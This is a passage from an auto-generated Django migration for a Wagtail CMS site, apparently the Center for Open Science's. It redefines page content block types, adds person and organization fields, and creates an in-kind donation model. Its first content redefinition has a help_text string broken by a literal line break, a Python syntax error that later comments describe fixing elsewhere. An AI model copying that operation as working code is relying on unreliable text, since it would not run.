wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', 
wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True)))))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', 
wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True)))))), blank=True, null=True),
),
# Optional social-profile URL fields for Person (github, google_plus,
# twitter); all blank-able so existing rows need no data migration.
migrations.AddField(
model_name='person',
name='github',
field=models.URLField(blank=True),
),
migrations.AddField(
model_name='person',
name='google_plus',
field=models.URLField(blank=True),
),
migrations.AddField(
model_name='person',
name='twitter',
field=models.URLField(blank=True),
),
# InkindDonation: like Donation but without a monetary amount — a dated
# non-cash contribution with a rich-text thank-you, attached to an
# Organization via ParentalKey (related_name='inkind_donations').
# Ordered by date; searchable via wagtailsearch.index.Indexed.
migrations.CreateModel(
name='InkindDonation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('thank_you_message', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('organization', modelcluster.fields.ParentalKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='inkind_donations', to='common.Organization', verbose_name='Organization')),
],
options={
'ordering': ['date'],
},
bases=(models.Model, wagtail.wagtailsearch.index.Indexed),
),
# Optional public-facing fields for Organization: a website URL and a
# rich-text introduction; both blank-able so existing rows are unaffected.
migrations.AddField(
model_name='organization',
name='url',
field=models.URLField(blank=True),
),
migrations.AddField(
model_name='organization',
name='introduction',
field=wagtail.wagtailcore.fields.RichTextField(blank=True),
),
# Auto-generated Django migration operation (makemigrations output): re-serializes
# the CustomPage.content StreamField block definitions.
# FIX: the 'raw_html' help_text previously contained a literal (unescaped) newline
# inside a single-quoted string — a SyntaxError in Python. Restored as an escaped
# '\n' so the help text keeps its intended line break. No other token changed.
migrations.AlterField(
    model_name='custompage',
    name='content',
    field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. \nBe careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True))))), ('sponsor_partner_block', wagtail.wagtailcore.blocks.StreamBlock((('displayChoice', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('sponsor', 'sponsor'), ('partner', 'partner')], default='sponsor')),)))), blank=True, null=True),
),
# Auto-generated Django migration operation (makemigrations output): re-serializes
# the CustomPage.content StreamField block definitions (here 'sponsor_partner_block'
# is a StructBlock with 'sponsors'/'partners' choices).
# FIX: the 'raw_html' help_text previously contained a literal (unescaped) newline
# inside a single-quoted string — a SyntaxError in Python. Restored as an escaped
# '\n' so the help text keeps its intended line break. No other token changed.
migrations.AlterField(
    model_name='custompage',
    name='content',
    field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. \nBe careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True))))), ('sponsor_partner_block', wagtail.wagtailcore.blocks.StructBlock((('displayChoice', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('sponsors', 'sponsors'), ('partners', 'partners')], default='sponsors')),)))), blank=True, null=True),
),
# Auto-generated Django migration operation (makemigrations output): re-serializes
# the CustomPage.content StreamField block definitions. NOTE(review): this revision
# appears to introduce 'customImage', 'table_block', 'collapse_block' and 'button'
# blocks and uses the name 'calender_block' — confirm against the model history
# before hand-editing; machine-generated serialization should normally be left as-is.
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('customImage', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', 
wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', 
wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('table_block', common.blocks.table.CustomTableBlock()), ('calender_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io. You can also change the style of calendar block.', max_length=255, required=True))))), ('journal_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('participating journals', 'participating journals'), ('eligible journals', 'eligible journals'), ('journals signatory', 'journals signatory')], default='participating journals'))))), ('render_file', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('file_link', wagtail.wagtailcore.blocks.CharBlock(help_text='Full link to the file on the OSF', max_length=255, required=True))))), ('sponsor_partner_block', wagtail.wagtailcore.blocks.StructBlock((('displayChoice', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('sponsors', 'sponsors'), ('partners', 'partners')], default='sponsors')),))), ('collapse_block', wagtail.wagtailcore.blocks.StructBlock((('title', wagtail.wagtailcore.blocks.CharBlock()), ('list', common.blocks.collapsebox.CollapseBoxListBlock())))), ('button', wagtail.wagtailcore.blocks.StructBlock((('css_style', 
wagtail.wagtailcore.blocks.CharBlock(required=False)), ('description', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('link', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)))))), blank=True, null=True),
),
# Tighten Organization.name: a unique CharField capped at 255 characters.
migrations.AlterField(
    field=models.CharField(unique=True, max_length=255),
    model_name='organization',
    name='name',
),
# Auto-generated Django migration operation (makemigrations output): re-serializes
# the CustomPage.content StreamField block definitions. NOTE(review): in this
# revision the 'button' block's 'link' field is a URLBlock (URL-validated) rather
# than a plain CharBlock — machine-generated serialization; do not hand-edit.
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabs', wagtail.wagtailcore.blocks.StructBlock((('tab_list', common.blocks.tabs.TabListBlock()), ('tabs_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'Vertical'), ('horizontal', 'Horizontal')], default='horizontal'))))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max-width:225px;max-height:145px;padding-top:20px', 'Small Pushed Down 20px'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('customImage', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', 
wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise-team')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('text', wagtail.wagtailcore.blocks.RichTextBlock())))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),)))))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('css_style', wagtail.wagtailcore.blocks.CharBlock(required=False)), ('height', wagtail.wagtailcore.blocks.IntegerBlock())))), ('clear_fixblock', 
